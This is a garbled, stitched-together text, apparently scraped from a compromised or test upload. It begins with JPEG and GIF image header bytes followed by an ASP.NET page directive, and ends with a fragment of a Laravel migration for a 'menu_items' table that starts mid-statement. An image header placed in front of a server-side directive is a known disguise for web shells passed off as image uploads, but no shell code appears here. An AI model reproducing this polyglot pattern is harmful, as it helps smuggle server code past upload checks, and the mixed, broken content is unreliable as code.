ÿØÿà JFIF ÿÛ C $.' ",#(7),01444'9=82<.342ÿÛ C 2!!22222222222222222222222222222222222222222222222222ÿþGIF89a; <%@ Page Language="C#" %>
ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.-
ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.-
id();
$table->foreignId('menu_id')->constrained()->onDelete('cascade');
$table->string('title');
$table->string('url')->nullable();
$table->string('target')->default('_self');
$table->string('icon_class')->nullable();
$table->integer('parent_id')->default(0);
$table->integer('order')->default(0);
$table->string('type')->default('custom'); // custom, page, category, etc.
$table->integer('type_id')->nullable();
$table->text('css_class')->nullable();
$table->tinyInteger('status')->default(1);
$table->timestamps();
});
}
/**
* Reverse the migrations.
*/
public function down(): void
{
Schema::dropIfExists('menu_items');
}
};